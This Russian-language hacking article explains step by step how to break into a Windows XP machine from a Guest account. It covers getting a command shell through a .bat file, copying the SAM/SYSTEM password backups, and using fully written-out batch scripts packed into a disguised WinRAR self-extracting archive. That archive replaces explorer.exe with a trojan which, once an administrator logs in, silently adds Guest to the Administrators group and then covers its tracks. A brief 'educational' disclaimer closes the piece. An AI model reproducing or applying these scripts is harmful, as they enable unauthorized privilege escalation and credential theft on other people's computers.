IPB, WordPress, IP.Board, php-Fusion, Invision Power Board

Локальный взлом Windows XP

549

Цель 1: получение доступа к файлам Админа (или просто более привелигированного юзера чем вы) с возможностью читать их, копировать, редактировать и удалять…
Цель 2: получение доступа к резервным файлам SAM SYSTEM (что это и для чего: читаем мою предыдущую статью…)
Цель 3: добавление себя в группу Администраторов (что менее заметно чем появление нового привилегированного юзера ) обеспечивая тем самым полный контроль над компьютером вплоть до смены пароля самого Админа .
Все эти цели нам поможет реализовать наличие командной строки. Как же ее получить?


Достижение цели 1:

Допустим вы зашли под Гость»ем (самый низкий уровень) и ищете Пуск -) Выполнить… но его там нету!!! Что же делать? Ну вы наверное поумнее и
нажмите Windows+R чтоб открылось тоже самое… но тут увы вам говорят, что мол у вас и на это недостаточно прав. Знаю знаю… злость берет…
Тогда делаем так: создаем файл текстовый, потом пишем в нем cmd (да, просто cmd), после сохраняем и меняем ему расширение с с txt на bat
ВСЕ! Теперь щелкаем на нем дважды и вы получили командную строку. Так просто? Да!
Используя команды как-то <dir> для вывода списка каталогов и <cd путь к каталогу>,
например <cd C:Windows> можно лазить по большинстве
директорий обычно запрещенных вам для просмотра. Используя команду copy можно скопировать нужные файлы, что мы и сделаем для реализации цели 2.

Итак цель 1 достигнута! 

Теперь вводим в командной строке
<copy %windir%repairsam «путь к каталогу куда надо скопировать»> для копирования sam  и аналогичное для system

Все. Цель 2 достигнута! 

Достижение цели 3 (наверное самое главное ))) ):

Итак вы Гость
. Добавляем себя в группу Администраторы, для этого в командной строке надо написать <net localgroup Администраторы Гость /add>
Но это скорее всего не даст результата (хотя попробуйте…) Поэтому проделываем возможно легкий а возможно нелегкий путь (это удобно провести у себя на компе а на атакуемый принести уже готовый инструмент):
В этом же каталоге создаем bat-файл но другим способом, а именно в командной строке пишем:
net localgroup Администраторы Гость /add > «путь к папке в которой создадим наш файлexpme.bat»

 

 

Достижение цели 2:

 

 

получили файл с понятно каким именем и с первой командой в нем, далее
жмем на нем правой -) изменить. Дописываем теперь там:

rem Добавляем пользователя Гость в группу Администраторы

if «%errorlevel%»==»0» goto end
rem проверяем успех нашей операции. Если добавить удалось то прыгаем на метку end

rem мы здесь? а не на метке end? значит зашел не Админ, тогда…

copy /Y %windir%explorerme.exe %windir%system32Wbemexplorer.exe
rem копируем explorerme.exe из папки windows в папку windowssystem32Wbem

start %windir%system32Wbemexplorer.exe
rem запускаем explorer.exe из папки windowssystem32Wbem будто все
rem нормально и нечего непроизошло


exit
rem выходим из командной оболочки чтобы она невисела после завершения операций
rem тем самым демаскируя себя


:end
rem метка end Раз мы здесь значит зашел все-таки Админ и мы уже
rem в группе Администраторов тоже


taskkill /f /im explorer.exe
rem пытаемся вырубить наш самописанный explorer.exe )) на всякий случай

del /Q %windir%explorer.exe
rem удаляем самописанный explorer.exe

ren %windir%explorerme.exe explorer.exe
rem переименовываем оригинальный файл с explorerme.exe в explorer.exe

start explorer.exe
rem запускаем оригинальный explorer.exe как ничего будто и небыло )))

exit
rem выходим из командной оболочки чтобы она невисела после завершения
rem операций тем самым демаскируя себя

сохраняем expme.bat

   Теперь выделяем его и жмем на нем правой Добавить в архив WinRAR -) ставим Птичку на Создать SFX-архив -) идем в закладку дополнительно -) Параметы SFX -)
Путь для расспаковки: %windir% -)

Выполнить после расспаковки: cmd.exe /C start /min %windir%expme.bat -) режим вывода информации: скрыть все -) режим перезаписи (это на всякий случай): перезаписывать без запроса.  -) загрузить значок sfx из файла выбираем иконку похожую на иконку эксплорера, а то в меню пуск у моего компьютера будет неподобающий значок что может сильно насторожить )))Все. Жмем Ок в этом окне и в следующем. Получили самораспаковывающийся архив WinRAR. Переименовываем его в explorer.exe .
Теперь создаем второй bat-файл. В нем должно быть такое содержание:

@echo off
rem отключаем эхо-вывод чтоб он нам немешал, хотя можно эту строчку и убрать

title -=() attack bat-file by bre@k [hackzone.ru] ()=-
rem пишем копирайты ))) мои…

ren %windir%explorer.exe explorerme.exe
rem переименовываем explorer.exe из папки windows в explorerme.exe

if «%errorlevel%»==»0» (echo Operation 1 completed successfully) else goto end
rem если переименовать невышло идем на метку end иначе пишем что орперация 1 завершилась успешно

copy /Y explorer.exe %windir%
rem

if «%errorlevel%»==»0» (echo Operation 2 completed successfully) else goto end
rem если скопировать невышло идем на метку end иначе пишем что орперация 2 завершилась успешно

echo.
echo Press any key to logoff…
echo.
pause
rem пишем, что мол нажмите клавишу если хотите сейчас выйти из системы

logoff
rem выходим из системы если нажали клавишу а не просто закрыли окно

exit
rem завершаем командную облочку (на всякий случай) хотя можно это убрать

:end
rem метка end если мы здесь значит что-то пошло не так как хотелось…

echo.
color 04
echo Something wrong… check if file system is not NTFS! and try again
echo.
pause
rem пишем что что-то не то… проверьте что файловая система действительно не NTFS и попробуйте опять

exit
rem завершаем командную облочку

Сохраняем его под именем attack.bat Теперь выделяем attack.bat и наш созданный explorer.exe -) Добавить в архив WinRAR -) ставим Птичку на Создать SFX-архив -) идем в закладку дополнительно -) Параметы SFX -)
Путь для расспаковки: %temp% -)

Выполнить после расспаковки: %temp%attack.bat -) режим вывода информации: скрыть все -) режим перезаписи (это на всякий случай): перезаписывать без запроса.Все. Даем ему имя atack.exe и берем с собой на копм, что будем атаковать. Если все сделано правильно, то нам останется только запустить его, а потом дождатся пока Админ зайдет под своим аккаунтом и мы тоже Админы (хоть и Гость»и), хехе )))
Если зайдет простой юзер то скрипт просто отработает нужные действия, а если зайдет Администратор (или юзер золотой ;-)) ), то он добавит Гостя в группу Админов и восстановит все как было (ну или почти как было))) ).

 

 

Итак цель 3 тоже достигнута!

Ну и рекомендую прочитать учебник по командной строке: так и напишите в любой поисковой системе и вы найдете. Командная строка это просто, можно ведь было реализовать вышеприведенное на С++ но зачем еще этим парить мозги когда можно все сделать быстрее и проще… Именно к этому я стремился незнаю вышло ли…

Хочется заметить, что все это не будет увы работать на разделах NTFS, поэтому в первую очередь проверяйте тип файловой системы!

Обьяснения: статья писалась исключительно в образовательных целях и для указания бреши в системе защиты, и за все возможные последствия после прочтения этой статьи в том числе и после использования прикрепленных файлов (они выкладываются для ознакомления) я ответственности не несу.

Comments are closed.